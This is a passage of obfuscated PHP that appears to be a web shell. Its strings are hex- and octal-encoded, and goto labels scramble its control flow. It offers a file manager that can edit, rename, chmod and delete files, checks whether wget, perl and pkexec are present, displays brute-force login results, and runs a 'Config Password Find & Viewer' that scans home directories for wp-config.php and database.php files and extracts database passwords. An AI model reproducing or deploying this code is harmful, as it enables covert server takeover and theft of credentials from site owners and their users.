} } $successfulOutput = implode("\xa", $successfulLogins); $failedOutput = implode("\12", $failedLogins); echo "\x3c\x64\x69\166\x20\143\x6c\x61\x73\163\75\x22\146\157\x72\x6d\55\147\x72\x6f\165\x70\x22\76"; echo "\74\143\x65\x6e\164\x65\x72\76\x3c\x68\x32\76\x42\162\165\164\145\x20\106\x6f\162\143\145\x20\122\x65\x73\165\x6c\x74\163\74\x2f\150\62\x3e\74\57\143\145\156\x74\145\162\x3e"; echo "\74\x74\145\x78\x74\141\162\145\x61\x20\143\154\141\x73\x73\75\42\146\x6f\x72\155\55\x63\x6f\156\x74\x72\157\x6c\40\142\x74\156\x2d\x73\155\x20\x74\145\x78\x74\55\x64\x61\x72\x6b\x22\40\x72\x6f\167\x73\x3d\42\67\x22\40\162\145\x61\x64\157\156\154\171\76" . htmlspecialchars($successfulOutput) . "\74\x2f\164\145\170\x74\x61\x72\x65\141\76"; echo "\x3c\57\x64\151\166\x3e"; } else { echo "\74\x73\x63\x72\x69\x70\x74\x3e\141\x6c\x65\162\x74\x28\47\120\141\x79\x20\141\x74\164\145\156\x74\151\x6f\156\40\x74\x6f\40\164\x68\145\x20\143\150\x6f\151\143\145\163\40\x61\156\144\x20\146\x6f\x72\x6d\163\40\171\157\165\x20\146\x69\154\x6c\x20\157\x75\164\54\40\163\164\165\160\x69\x64\x21\x27\51\74\x2f\x73\143\162\x69\160\x74\x3e"; } } } goto xpwtc; LZ0AL: @ini_set("\x65\x72\162\157\x72\x5f\154\157\147", null); goto lHbNL; H5qMP: if ($_1337["\141\x63\x74\x69\157\x6e"] == "\x65\144\x69\x74") { s(); echo "\12\x9\x9\74\144\x69\x76\40\x63\154\x61\x73\x73\x3d\47\142\x74\156\55\x67\x72\157\165\x70\47\x3e\xa\x9\11\11\x3c\x61\x20\143\x6c\141\x73\163\x3d\47\142\x74\x6e\40\x62\x74\156\x2d\157\165\x74\x6c\151\x6e\145\55\x6c\151\147\x68\x74\40\x62\x74\156\55\x73\155\47\40\150\x72\x65\146\75\x27\x3f\144\x69\x72\x3d{$path}\x26\141\143\x74\151\x6f\x6e\75\x76\151\x65\167\x26\157\x70\156\75{$file}\x27\76\x3c\151\40\x63\x6c\x61\163\x73\75\x27\x62\x69\x20\142\x69\55\145\171\145\x27\76\x3c\57\151\x3e\x3c\57\x61\x3e\12\74\141\40\x63\x6c\x61\163\x73\75\47\x62\x74\x6e\40\x62\164\x6e\55\157\165\164\x6c\151\156\145\x2d\x6c\151\x67\x68\164\x20\x62\164\156\x2d\x73\155\47\x20\x68\162\x65\146\75\47\x3f\144\151\x72\x3d{$path}\x26\141\143\164\x69\157\156\75\145\144\x69\x74\x26\x6f\x70\x6e\x3d{$file}\47\76\74\151\40\143\154\x61\163\x73\75\x27\x62\x69\40\142\151\x2d\x70\145\x6e\143\151\154\x2d\x73\x71\x75\141\162\145\x27\76\x3c\57\151\x3e\x3c\x2f\x61\76\xa\74\141\x20\x63\x6c\x61\163\163\75\47\142\164\x6e\40\x62\164\156\x2d\157\x75\x74\x6c\151\x6e\145\x2d\154\x69\147\x68\x74\x20\142\164\156\x2d\x73\155\47\40\x68\162\x65\x66\x3d\47\x3f\144\151\x72\x3d{$path}\x26\141\x63\164\151\157\x6e\x3d\x72\145\156\141\x6d\x65\x26\157\x70\x6e\75{$file}\47\76\74\151\40\x63\x6c\141\x73\x73\75\47\142\x69\40\142\151\x2d\x70\145\156\143\151\x6c\55\146\x69\154\x6c\x27\x3e\x3c\x2f\x69\76\x3c\x2f\141\x3e\xa\x3c\141\x20\143\154\141\x73\x73\x3d\47\142\164\x6e\40\x62\x74\x6e\55\x6f\165\164\154\151\x6e\x65\x2d\154\151\147\150\x74\40\142\x74\156\x2d\163\x6d\x27\40\x68\x72\x65\146\75\x27\77\144\x69\x72\x3d{$path}\x26\x61\143\x74\x69\x6f\x6e\75\x63\150\x61\x6e\147\x65\x6d\x6f\x64\151\146\x69\145\x64\46\157\160\156\75{$file}\47\76\x3c\x69\40\x63\154\141\x73\x73\75\x27\142\151\40\x62\x69\55\143\x61\154\x65\x6e\144\141\162\55\144\x61\x74\x65\x27\x3e\x3c\57\151\x3e\x3c\57\x61\x3e\12\x3c\141\x20\x63\x6c\x61\x73\x73\x3d\x27\x62\164\156\x20\142\x74\x6e\55\x6f\x75\x74\x6c\151\x6e\145\x2d\154\151\147\x68\x74\x20\142\164\x6e\55\163\155\x27\40\150\x72\x65\146\x3d\47\77\144\x69\162\x3d{$path}\x26\141\x63\x74\151\x6f\156\x3d\143\150\x65\155\x6f\144\x26\x6f\x70\x6e\75{$file}\47\x3e\74\x69\x20\143\154\x61\x73\163\x3d\47\x62\x69\40\142\151\55\146\x69\x6c\145\55\x65\141\162\155\x61\x72\153\55\x6d\x65\144\x69\143\141\154\x27\x3e\x3c\x2f\x69\x3e\74\x2f\141\76\xa\x3c\x61\x20\x63\x6c\x61\x73\163\75\47\142\164\x6e\x20\142\x74\x6e\55\x6f\x75\164\x6c\151\x6e\145\55\x64\141\156\x67\145\162\x20\142\x74\156\55\163\x6d\47\x20\150\x72\145\x66\75\x27\x3f\144\151\162\x3d{$path}\46\141\x63\164\151\x6f\156\x3d\144\x65\x6c\145\x74\x65\x5f\x66\x69\x6c\x65\x26\157\x70\156\75{$file}\x27\76\x3c\x69\x20\x63\154\x61\163\163\75\47\142\x69\40\x62\151\x2d\164\x72\141\x73\x68\55\x66\x69\x6c\x6c\x27\76\74\x2f\x69\x3e\74\57\x61\x3e\xa\x3c\57\144\x69\x76\76\x3c\142\162\76\74\x69\x20\x63\x6c\x61\163\163\x3d\x27\x62\x69\40\x62\151\x2d\146\x69\154\145\x2d\x65\x61\162\155\141\x72\x6b\x27\76\x3c\x2f\151\76\x3a\x26\156\x62\x73\160\x3b" . basename($file) . "\x3c\x2f\142\x72\76\xa\x9\x9\x3c\146\157\162\x6d\40\155\x65\164\150\x6f\144\x3d\47\120\117\123\124\x27\x3e\12\11\11\x9\x3c\164\x65\170\164\x61\x72\145\x61\x20\143\x6c\141\163\x73\75\x27\146\157\162\155\55\143\x6f\x6e\x74\x72\x6f\154\x20\142\164\156\55\x73\x6d\47\x20\162\157\167\163\75\47\x31\x30\47\x20\x6e\x61\155\x65\x3d\47\143\x6f\156\x74\x65\156\164\163\x27\x20{$_r}\76" . htmlspecialchars(file_get_contents($file)) . "\74\x2f\164\x65\170\164\141\x72\145\x61\x3e\xa\x9\11\11\74\144\x69\166\x20\143\154\141\163\163\x3d\47\144\55\x67\162\x69\144\40\x67\141\160\x2d\62\x27\x3e\x3c\142\x72\76\12\11\11\11\x9\74\142\165\164\x74\157\156\x20\x63\x6c\141\163\x73\75\x27\142\164\156\x20\x62\x74\x6e\55\157\x75\x74\x6c\151\156\x65\55\154\x69\x67\x68\164\40\142\x74\x6e\x2d\x73\155\47\x20\x74\171\x70\x65\75\47\163\x75\155\142\151\x74\x27\40\156\x61\x6d\145\75\x27\145\144\151\x74\137\146\x69\x6c\145\47\x3e\74\x69\40\x63\x6c\141\163\x73\x3d\x27\x62\x69\x20\142\x69\55\x65\x6d\x6f\x6a\x69\x2d\163\155\x69\154\145\x2d\165\160\x73\x69\x64\145\x2d\144\x6f\167\x6e\x27\x3e\x3c\57\151\76\74\x2f\x62\165\x74\164\157\x6e\76\12\x9\11\11\74\57\x64\151\x76\76\xa\11\x9\74\x2f\x66\x6f\x72\x6d\x3e"; } goto Qt1rA; c4BSp: function ok() { echo "\x3c\x64\x69\x76\x20\143\154\x61\x73\163\x3d\x22\141\x6c\145\162\x74\x20\x61\x6c\145\162\x74\x2d\163\165\143\x63\145\x73\x73\40\141\154\x65\x72\164\55\x64\x69\163\x6d\151\163\x73\151\142\x6c\x65\40\x66\141\144\145\40\x73\x68\157\x77\40\155\171\55\x33\x22\40\x72\157\x6c\x65\x3d\42\141\154\145\x72\164\42\x3e\74\142\165\x74\x74\157\x6e\40\164\171\160\145\x3d\42\142\x75\164\164\157\156\x22\40\143\x6c\141\163\163\x3d\x22\x62\164\156\55\x63\x6c\157\163\x65\42\40\x64\x61\x74\x61\55\142\x73\x2d\144\x69\163\x6d\x69\x73\163\75\x22\x61\x6c\x65\162\x74\42\40\141\x72\151\141\x2d\154\141\142\x65\154\x3d\x22\103\154\x6f\x73\x65\x22\76\74\x2f\x62\165\164\x74\157\156\x3e"; } goto KJRak; HWVuk: if (isset($_1337["\144\x69\162\x6e\145\167"])) { s(); if (isset($_1337["\143\x72\145\x61\x74\x65"])) { $name = $_1337["\156\141\x6d\145\137\144\x69\x72"]; foreach ($name as $name_dir) { $folder = preg_replace("\50\x5b\136\134\x77\x5c\163\x5c\144\x5c\55\x5f\x7e\54\x3b\x3a\x5c\133\134\135\x5c\x28\134\x5d\x2e\x5d\x7c\133\134\56\135\x7b\62\x2c\x7d\x29", '', $name_dir); $fd = @mkdir($folder); } if ($fd) { echo "\74\163\143\162\x69\x70\x74\76\x77\x69\x6e\x64\x6f\x77\x2e\x6c\157\143\141\x74\x69\157\x6e\x3d\47\77\160\x61\164\x68\75{$path}\47\74\57\x73\143\162\x69\160\164\x3e"; } else { echo "\74\x73\164\162\x6f\x6e\x67\x3e\x43\162\145\141\164\145\40\x64\x69\x72\x3c\57\x73\164\162\x6f\x6e\x67\76\40\x46\x41\111\114\x21\40" . er() . "\x3c\57\x64\151\166\x3e"; } } echo "\12\11\x9\x3c\x64\x69\x76\x20\x63\154\x61\x73\x73\x3d\x27\x6d\142\x2d\x33\x27\x3e\xa\11\x9\x9\74\146\157\162\155\40\x6d\145\x74\150\157\144\75\x27\x50\117\x53\x54\x27\x3e\xa\x9\x9\11\11\74\151\x20\143\x6c\141\163\163\75\x27\x62\151\x20\142\x69\x2d\x66\157\154\x64\x65\162\x27\76\x3c\57\151\x3e\x20\x44\x69\162\145\143\164\x6f\162\x79\x20\x6e\141\x6d\x65\x3a\12\11\11\x9\x9\x3c\x64\x69\x76\40\143\154\141\163\x73\x3d\47\151\x6e\x70\x75\164\x2d\x67\x72\157\x75\x70\40\x6d\x62\x2d\63\x27\x3e\xa\x9\11\11\x9\11\74\151\x6e\x70\x75\164\x20\143\154\141\x73\x73\x3d\x27\x66\x6f\x72\155\x2d\143\157\156\x74\162\157\x6c\x20\x66\x6f\x72\x6d\x2d\143\157\156\x74\162\x6f\154\x2d\x73\x6d\40\x74\145\170\x74\x2d\x64\x61\162\153\47\x20\164\x79\160\x65\x3d\47\164\145\170\x74\47\40\x6e\141\x6d\145\75\47\156\x61\155\145\137\x64\x69\162\133\x5d\47\40\160\x6c\141\x63\145\x68\157\154\x64\x65\x72\x3d\x27\116\x65\167\x20\x46\x6f\x6c\x64\145\x72\x27\40{$_r}\76\xa\11\11\x9\11\x9\74\x69\156\x70\x75\x74\40\143\x6c\141\x73\163\x3d\x27\x62\164\x6e\x20\x62\164\156\x2d\x6f\165\x74\x6c\x69\x6e\145\55\154\151\147\x68\x74\x20\142\164\156\x2d\x73\155\47\x20\164\171\160\145\75\x27\x73\x75\x62\x6d\151\164\47\x20\x6e\141\x6d\x65\x3d\47\x63\x72\145\x61\164\145\47\x20\166\141\154\165\145\75\x27\103\x72\145\x61\x74\x65\x20\x44\151\x72\x65\x63\x74\x6f\162\171\41\47\76\12\11\11\x9\x9\x3c\57\x64\x69\x76\x3e\xa\11\11\11\x3c\57\x66\x6f\x72\x6d\x3e\xa\11\11\74\x2f\144\x69\x76\x3e"; } goto YgDiD; I3jr4: $pl = exe("\x70\145\162\154\x20\x2d\x2d\x68\x65\x6c\160") ? "\x3c\x67\x72\x3e\117\116\x3c\x2f\147\162\x3e" : "\x3c\162\x64\76\x4f\x46\x46\x3c\57\x72\144\x3e"; goto S3aat; S_jZN: $sql = function_exists("\155\171\163\161\x6c\x5f\x63\x6f\156\x6e\145\x63\164") ? "\74\x67\162\x3e\x4f\116\x3c\57\147\x72\76" : "\x3c\x72\x64\x3e\117\x46\106\x3c\57\x72\x64\x3e"; goto AQaOe; GLlWs: $path = str_replace("\x5c", "\x2f", $path); goto uWBu2; zUYD7: echo "\74\x2f\x74\x62\x6f\x64\171\x3e\x3c\x2f\164\x61\x62\x6c\x65\x3e\x3c\57\144\151\166\76\74\x63\145\156\x74\x65\x72\x3e\x3c\144\151\x76\x20\x63\154\x61\x73\x73\75\x27\164\145\170\x74\x2d\167\x68\151\164\145\x27\76\x3c\x68\x72\76\74\x66\157\x6e\164\x20\x63\157\x6c\x6f\162\75\x27\167\150\x69\164\145\47\x3e\x26\x63\157\x70\x79\x3b\40\x4c\x4f\114\103\101\124\x53\x3c\x2f\146\x6f\156\x74\x3e\74\x2f\x64\x69\166\76\x3c\x2f\x63\x65\x6e\x74\145\x72\x3e\74\57\142\x6f\x64\171\x3e\x3c\57\150\164\155\x6c\x3e"; goto QJtcJ; zGf7Y: function sz($byt) { $typ = array("\102", "\113\102", "\x4d\102", "\107\x42", "\x54\102"); for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . "\40" . $typ[$i]; } goto epcoG; qpHXb: $scand = scandir($path); goto BO6Au; uqK5Y: $pkexec = exe("\x70\153\145\170\145\143\x20\x2d\55\x76\145\x72\163\151\x6f\156\x22") ? "\x3c\147\x72\76\117\116\74\x2f\147\162\76" : "\x3c\162\144\x3e\117\106\x46\x3c\57\162\x64\76"; goto wJ3It; o9cS8: function w($dir, $perm) { if (!is_writable($dir)) { return "\x3c\162\x64\x3e" . $perm . "\x3c\57\162\x64\x3e"; } else { return "\74\147\162\x3e" . $perm . "\74\x2f\x67\162\x3e"; } } goto nyFwq; N78pn: @ini_set("\155\x61\x78\137\x65\170\x65\x63\x75\164\x69\x6f\156\x5f\x74\x69\155\145", 0); goto iv_HC; T0K_d: if (isset($_1337["\160\x61\164\x68"])) { $path = $_1337["\160\x61\164\150"]; chdir($path); } else { $path = $gcw(); } goto gUtZv; XcvSP: if ($_1337["\x61\x63\x74\x69\x6f\x6e"] == "\x72\x65\x6e\x61\155\145") { s(); echo "\xa\x9\11\x3c\x64\x69\x76\x20\x63\x6c\141\x73\x73\75\x27\x62\x74\156\x2d\x67\162\157\165\160\47\x3e\xa\11\11\x9\74\141\x20\143\x6c\141\163\163\75\x27\142\164\156\40\142\164\156\x2d\157\165\x74\x6c\151\x6e\145\55\x6c\x69\147\150\164\x20\142\x74\x6e\55\163\x6d\47\40\x68\x72\145\x66\75\47\77\144\x69\x72\x3d{$path}\x26\141\x63\164\x69\x6f\156\x3d\166\151\145\167\46\157\x70\x6e\x3d{$file}\47\76\74\151\x20\143\154\141\163\163\x3d\x27\142\151\40\142\151\55\145\x79\x65\47\76\x3c\57\x69\76\74\x2f\x61\x3e\12\x3c\141\40\x63\x6c\141\x73\x73\75\x27\142\164\x6e\x20\142\x74\156\55\x6f\x75\164\154\x69\156\145\55\154\x69\x67\150\164\40\x62\x74\x6e\55\x73\155\47\x20\x68\x72\x65\146\75\47\x3f\x64\151\x72\75{$path}\46\141\x63\x74\x69\157\156\x3d\x65\144\151\x74\x26\x6f\160\x6e\75{$file}\x27\x3e\x3c\151\x20\143\154\x61\163\163\75\47\x62\x69\40\142\x69\55\x70\145\x6e\143\x69\154\55\163\161\x75\141\162\x65\x27\x3e\74\x2f\x69\76\x3c\x2f\x61\x3e\xa\x3c\x61\x20\x63\x6c\x61\163\163\75\x27\142\x74\x6e\40\142\164\x6e\55\157\x75\x74\x6c\x69\x6e\145\55\x6c\151\147\150\164\40\142\164\156\55\x73\155\47\x20\x68\x72\x65\146\75\x27\x3f\x64\x69\162\75{$path}\46\141\x63\164\x69\x6f\156\75\x72\145\156\x61\x6d\x65\46\x6f\x70\x6e\x3d{$file}\x27\76\74\151\40\143\154\x61\x73\x73\75\47\142\151\40\x62\151\55\x70\x65\x6e\143\151\x6c\55\x66\151\154\154\47\x3e\74\57\x69\76\x3c\x2f\x61\76\12\x3c\x61\40\x63\154\141\163\x73\75\47\x62\x74\x6e\x20\142\x74\156\x2d\157\165\x74\x6c\151\x6e\145\x2d\154\151\147\150\164\x20\x62\164\x6e\x2d\163\155\x27\40\150\x72\145\146\x3d\47\x3f\144\x69\x72\x3d{$path}\x26\141\143\164\151\x6f\x6e\75\143\x68\141\156\147\145\155\157\144\x69\x66\x69\145\144\46\x6f\x70\x6e\75{$file}\x27\x3e\x3c\151\40\143\x6c\x61\163\x73\75\x27\142\151\40\x62\151\x2d\143\x61\x6c\145\156\x64\141\162\x2d\144\x61\x74\145\x27\76\x3c\57\151\x3e\x3c\x2f\141\x3e\xa\x3c\141\x20\x63\x6c\x61\163\x73\75\x27\x62\x74\x6e\40\142\164\156\55\x6f\x75\x74\154\x69\x6e\x65\x2d\x6c\x69\x67\150\x74\x20\142\164\156\55\163\155\47\40\150\x72\x65\x66\x3d\x27\77\x64\151\x72\75{$path}\x26\x61\143\x74\151\x6f\156\75\143\x68\x65\x6d\157\144\x26\x6f\160\156\75{$file}\x27\x3e\x3c\x69\x20\x63\x6c\x61\163\x73\75\47\142\x69\40\x62\151\x2d\x66\x69\x6c\145\55\145\x61\x72\155\141\162\x6b\x2d\155\145\x64\x69\x63\x61\154\x27\x3e\74\57\x69\76\x3c\x2f\141\x3e\12\74\x61\x20\143\154\x61\x73\163\75\x27\x62\164\156\40\x62\164\156\55\x6f\x75\164\x6c\x69\156\x65\x2d\x64\141\x6e\147\x65\162\40\x62\164\156\x2d\163\x6d\47\x20\x68\x72\x65\146\x3d\x27\x3f\144\151\162\x3d{$path}\x26\141\x63\x74\151\x6f\x6e\75\x64\x65\x6c\x65\x74\145\137\x66\151\x6c\x65\x26\x6f\160\156\x3d{$file}\47\76\74\x69\40\143\154\x61\x73\163\75\47\142\151\x20\x62\x69\x2d\164\x72\x61\x73\150\x2d\146\151\154\x6c\x27\76\74\57\151\x3e\74\x2f\141\x3e\xa\x3c\57\144\151\x76\x3e\74\142\x72\76\74\151\40\143\154\141\163\x73\x3d\47\x62\151\x20\x62\151\55\x66\151\154\145\x2d\x65\x61\162\155\x61\162\x6b\47\x3e\x3c\57\x69\x3e\x3a\46\156\x62\163\160\x3b" . basename($file) . "\74\x2f\x62\x72\x3e\xa\x9\11\74\x66\157\x72\x6d\x20\155\x65\x74\150\157\144\x3d\x27\x50\117\x53\x54\x27\x3e\xa\x9\x9\x9\74\144\x69\166\x20\x63\154\141\163\x73\75\47\151\x6e\x70\165\x74\55\x67\x72\157\x75\160\47\76\12\x9\x9\11\x9\74\151\156\160\165\164\40\x63\154\x61\x73\x73\75\x27\x66\x6f\x72\155\x2d\143\x6f\x6e\x74\162\157\x6c\x20\142\164\156\55\x73\155\47\x20\164\171\160\x65\x3d\47\164\x65\170\164\x27\40\x6e\x61\x6d\145\x3d\x27\x6e\145\167\x5f\x6e\x61\x6d\x65\x27\40\x76\x61\154\165\x65\75\47" . basename($file) . "\47\x20{$_r}\x3e\12\11\11\11\x9\74\142\x75\x74\164\x6f\x6e\40\x63\154\x61\163\x73\75\x27\142\x74\x6e\x20\x62\x74\x6e\x2d\x6f\x75\x74\x6c\151\x6e\x65\x2d\x6c\x69\147\x68\x74\x20\142\x74\x6e\x2d\163\x6d\47\x20\x74\171\x70\x65\75\47\163\x75\x6d\x62\151\164\47\x20\156\x61\x6d\145\75\47\162\x5f\x66\x27\76\x3c\x69\x20\x63\x6c\141\163\163\75\x27\142\x69\x20\142\x69\55\145\x6d\x6f\x6a\151\55\x73\x6d\151\154\x65\55\165\160\163\x69\x64\x65\55\144\x6f\167\156\47\x3e\x3c\57\x69\x3e\74\x2f\142\165\x74\x74\x6f\x6e\x3e\12\11\x9\x9\74\57\x64\151\x76\76\12\11\x9\x3c\57\x66\x6f\162\155\76"; } goto L2Ix3; yAMz0: $wget = exe("\x77\x67\145\164\x20\55\x2d\x68\x65\x6c\x70") ? "\x3c\x67\x72\76\x4f\116\x3c\57\x67\x72\x3e" : "\74\162\144\x3e\117\106\106\x3c\x2f\162\x64\76"; goto I3jr4; zKCFG: if ($_1337["\x69\x64"] == "\143\x6f\156\x66") { s(); echo "\x3c\143\145\156\164\145\162\40\x63\154\141\163\x73\x3d\42\141\156\165\x22\x3e\x43\x6f\x6e\x66\151\147\40\x50\x61\x73\163\167\x6f\x72\x64\40\x46\x69\x6e\x64\40\46\40\126\x69\145\167\x65\x72\74\x2f\x63\145\156\x74\x65\x72\x3e\12\x20\40\x20\40\40\x20\40\x20\x3c\144\151\166\x20\143\x6c\x61\163\x73\x3d\x22\146\x6f\162\x6d\55\x67\162\x6f\165\160\x22\x3e"; function findPhpFilesWithMysqliConnect($directories) { $result = array(); foreach ($directories as $directory) { $directory = realpath($directory); if ($directory && is_dir($directory)) { $phpFiles = findAllPhpFiles($directory); foreach ($phpFiles as $file) { $contents = file_get_contents($file); if (strpos($contents, "\x6d\x79\x73\x71\154\151\137\143\157\156\x6e\145\x63\x74") !== false && strpos($contents, "\154\157\143\x61\x6c\x68\x6f\x73\164") !== false) { $result[] = $file; } } } } return $result; } function findAllPhpFiles($directory) { $result = array(); $items = scandir($directory); foreach ($items as $item) { if ($item == "\56" || $item == "\56\56") { continue; } $itemPath = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($itemPath)) { $result = array_merge($result, findAllPhpFiles($itemPath)); } else { if (pathinfo($item, PATHINFO_EXTENSION) === "\x70\x68\160") { $result[] = $itemPath; } } } return $result; } function getUserHomePath() { $userId = posix_geteuid(); $userInfo = posix_getpwuid($userId); $userName = $userInfo["\156\141\x6d\x65"]; return "\57\150\157\155\145\x2f{$userName}\57"; } function findFiles($directories, $filename) { $result = array(); foreach ($directories as $directory) { $directory = realpath($directory); if ($directory && is_dir($directory)) { $result = array_merge($result, findFilesInDirectory($directory, $filename)); } } return $result; } function findFilesInDirectory($directory, $filename) { $result = array(); $items = scandir($directory); foreach ($items as $item) { if ($item == "\x2e" || $item == "\x2e\56") { continue; } $itemPath = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($itemPath)) { $result = array_merge($result, findFilesInDirectory($itemPath, $filename)); } else { if (basename($item) === $filename) { $result[] = $itemPath; } } } return $result; } function extractPassword($filePath) { $contents = file_get_contents($filePath); if (preg_match("\x2f\47\x70\x61\x73\163\x77\157\x72\x64\47\134\x73\52\x3d\x3e\x5c\x73\52\47\x28\133\x5e\x27\135\x2b\51\x27\57", $contents, $matches)) { return $matches[1]; } if (preg_match("\x2f\x5c\x5b\47\x70\x61\x73\x73\x77\x6f\x72\144\x27\134\x5d\134\163\x2a\75\134\163\52\47\x28\x5b\136\47\135\53\51\x27\57", $contents, $matches)) { return $matches[1]; } if (preg_match("\57\x27\160\141\163\163\167\157\x72\144\47\134\163\x2a\75\76\134\163\x2a\42\x28\133\x5e\42\x5d\x2b\51\x22\57", $contents, $matches)) { return $matches[1]; } if (preg_match("\x2f\x22\x70\x61\163\163\167\x6f\x72\144\42\x5c\x73\x2a\x3d\76\x5c\163\x2a\x27\x28\x5b\136\47\135\x2b\51\x27\x2f", $contents, $matches)) { return $matches[1]; } if (preg_match("\x2f\x22\x70\x61\x73\163\x77\157\162\144\42\x5c\x73\x2a\x3d\x5c\x73\52\42\x28\133\136\x22\135\x2b\51\42\x2f", $contents, $matches)) { return $matches[1]; } if (preg_match("\57\x27\x70\141\x73\163\x77\157\x72\x64\47\x5c\x73\52\75\x5c\163\x2a\x27\x28\133\136\47\x5d\53\x29\47\57", $contents, $matches)) { return $matches[1]; } if (preg_match("\57\42\x70\x61\163\x73\x77\x6f\x72\144\42\134\163\52\75\134\x73\x2a\x27\x28\133\136\47\x5d\x2b\x29\x27\x2f", $contents, $matches)) { return $matches[1]; } if (preg_match("\57\160\141\x73\x73\x77\157\162\144\134\163\x2a\75\134\163\52\x27\x28\133\x5e\47\x5d\53\x29\47\57", $contents, $matches)) { return $matches[1]; } if (preg_match("\57\160\x61\x73\163\x77\x6f\x72\144\x5c\x73\52\x3d\x5c\163\x2a\x22\50\x5b\136\42\135\53\51\42\x2f", $contents, $matches)) { return $matches[1]; } if (preg_match("\x2f\x27\104\x42\137\120\x41\x53\x53\127\x4f\x52\104\x27\x5c\x73\52\x3d\x5c\163\x2a\x27\x28\133\x5e\47\x5d\53\x29\47\57", $contents, $matches)) { return $matches[1]; } return null; } function extractDbPassword($filePath) { $contents = file_get_contents($filePath); if (preg_match("\x2f\144\x65\146\x69\156\145\x5c\163\x2a\134\50\134\x73\x2a\x27\104\102\137\x50\101\x53\123\x57\x4f\122\x44\x27\134\163\52\x2c\x5c\163\x2a\x27\x28\x5b\x5e\x27\135\53\x29\x27\x5c\163\52\x5c\51\x2f", $contents, $matches)) { return $matches[1]; } return null; } $homePath = getUserHomePath(); echo "\74\x64\x69\166\x20\143\154\141\x73\x73\75\42\143\x61\x72\x64\40\143\x61\x72\144\55\142\157\144\171\x20\164\x65\x78\164\x2d\144\141\162\x6b\40\x69\156\160\165\x74\55\147\162\x6f\x75\160\40\x6d\x62\55\63\x22\x3e\xa\40\40\x20\40\x20\40\40\40\74\146\157\162\x6d\x20\155\145\164\150\x6f\144\x3d\x22\120\x4f\x53\124\x22\76\12\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x3c\x69\40\x63\154\141\x73\163\x3d\x22\142\151\x20\x62\x69\x2d\x66\157\x6c\144\x65\x72\x22\x3e\x3c\x2f\x69\x3e\x20\x44\x69\162\145\143\164\x6f\x72\x79\72\xa\x20\40\40\40\40\x20\40\40\40\40\x20\40\x3c\x69\156\x70\165\x74\x20\x63\154\141\x73\x73\75\x22\x66\x6f\x72\155\55\x63\157\156\164\162\x6f\154\40\x62\164\x6e\55\x73\155\x20\x74\145\170\x74\x2d\144\x61\x72\153\x22\x20\x74\x79\x70\145\x3d\x22\x74\145\x78\164\x22\40\156\x61\x6d\x65\x3d\x22\144\151\162\145\x63\164\157\162\151\145\x73\x22\40\160\154\141\143\x65\x68\x6f\x6c\144\x65\162\75\x22" . htmlspecialchars($homePath) . "\42\76\12\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x3c\x64\151\x76\x20\x63\154\141\163\163\x3d\42\x66\157\162\x6d\x2d\143\150\x65\143\153\42\x3e\12\40\x20\x20\40\40\40\40\40\40\40\40\x20\40\x20\40\x20\x3c\x69\156\160\165\x74\x20\x63\x6c\141\x73\x73\x3d\42\146\157\162\x6d\55\x63\x68\x65\x63\x6b\x2d\x69\x6e\160\x75\164\x22\40\x74\171\x70\145\75\42\162\x61\x64\151\x6f\42\x20\x6e\141\155\145\75\x22\x73\145\x61\162\143\150\x5f\157\160\x74\151\x6f\156\42\x20\166\141\154\x75\145\75\x22\143\157\156\x66\151\x67\42\x20\143\x68\x65\143\153\145\x64\x3e\12\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x3c\154\x61\142\x65\154\x20\x63\x6c\141\x73\163\x3d\42\146\157\162\155\55\x63\150\x65\x63\153\55\x6c\141\x62\145\154\x22\40\x66\x6f\162\x3d\42\x63\157\156\x66\x69\x67\42\x3e\x46\151\156\144\x20\141\156\x64\40\x76\151\x65\x77\x20\x63\157\x6e\x66\x69\147\40\146\151\x6c\145\x20\160\x61\163\163\167\157\162\x64\163\x20\52\x2f\143\x6f\x6e\146\x69\x67\x2f\144\141\164\141\142\x61\163\145\x2e\160\150\x70\x20\46\x20\167\x70\55\x63\x6f\x6e\x66\x69\147\56\160\150\x70\x3c\x2f\x6c\141\x62\x65\x6c\x3e\xa\x20\40\x20\40\x20\x20\40\40\x20\40\40\40\x3c\x2f\144\x69\x76\76\12\40\x20\x20\40\40\40\x20\40\x20\40\40\x20\x3c\x64\x69\166\40\143\154\141\163\x73\x3d\x22\146\157\x72\155\x2d\143\150\x65\143\x6b\x22\x3e\xa\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\74\151\x6e\160\165\164\40\x63\154\x61\163\163\x3d\x22\x66\157\162\x6d\55\143\x68\x65\x63\153\x2d\x69\x6e\160\x75\x74\x22\x20\x74\x79\x70\x65\x3d\42\x72\x61\x64\151\157\42\40\x6e\x61\155\145\75\x22\163\x65\141\162\143\150\137\157\x70\x74\x69\157\x6e\x22\40\x76\x61\154\165\x65\x3d\x22\155\171\x73\161\154\151\137\143\157\156\x6e\x65\143\x74\42\76\12\40\x20\x20\40\40\40\40\x20\x20\40\40\x20\40\x20\40\40\74\154\141\x62\x65\154\40\x63\x6c\x61\x73\163\x3d\42\x66\x6f\162\155\55\143\150\x65\x63\x6b\55\x6c\141\142\145\x6c\x22\40\x66\x6f\x72\75\x22\x6d\x79\163\161\x6c\151\x5f\143\x6f\156\156\145\x63\164\42\x3e\x46\151\156\144\x20\143\157\x6e\x66\151\147\x20\160\x61\x73\x73\x77\157\162\144\x73\x20\151\x6e\x20\141\x6c\x6c\x20\x50\110\120\40\146\151\154\x65\x73\40\x74\x68\x61\x74\x20\143\x6f\156\164\141\x69\156\40\x74\150\x65\x20\x77\x6f\x72\144\40\x6d\x79\x73\161\154\x69\x5f\x63\x6f\156\156\145\x63\164\x20\46\x20\154\157\143\x61\154\150\x6f\x73\164\x3c\x2f\x6c\x61\x62\145\154\x3e\xa\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\74\x2f\x64\x69\x76\x3e\xa\40\40\40\40\x20\40\40\x20\x20\40\x20\x20\74\x64\151\166\x20\x63\154\141\x73\x73\75\x22\144\x2d\147\162\151\144\x20\147\x61\160\x2d\62\42\76\xa\40\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\x3c\x69\156\160\165\x74\x20\143\x6c\x61\163\163\75\x22\142\x74\x6e\x20\x62\164\x6e\x2d\144\141\162\153\40\142\164\x6e\55\x73\155\42\40\x74\x79\160\x65\x3d\42\163\x75